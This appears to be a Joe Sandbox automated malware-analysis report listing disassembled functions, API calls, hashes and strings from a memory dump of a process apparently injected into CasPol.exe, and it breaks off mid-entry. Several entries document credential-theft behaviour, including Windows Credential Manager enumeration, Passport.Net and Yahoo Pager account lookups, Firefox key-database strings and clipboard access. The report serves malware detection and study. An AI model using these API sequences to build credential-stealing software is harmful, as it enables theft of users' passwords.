                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                                                                                    • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                    • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                                                    • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                                    • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                    • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                    • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                    • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                                                                                    • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                                                    • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID: $no query solution
                                                                                                                                                                                                                    • API String ID: 368790112-326442043
                                                                                                                                                                                                                    • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                    • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
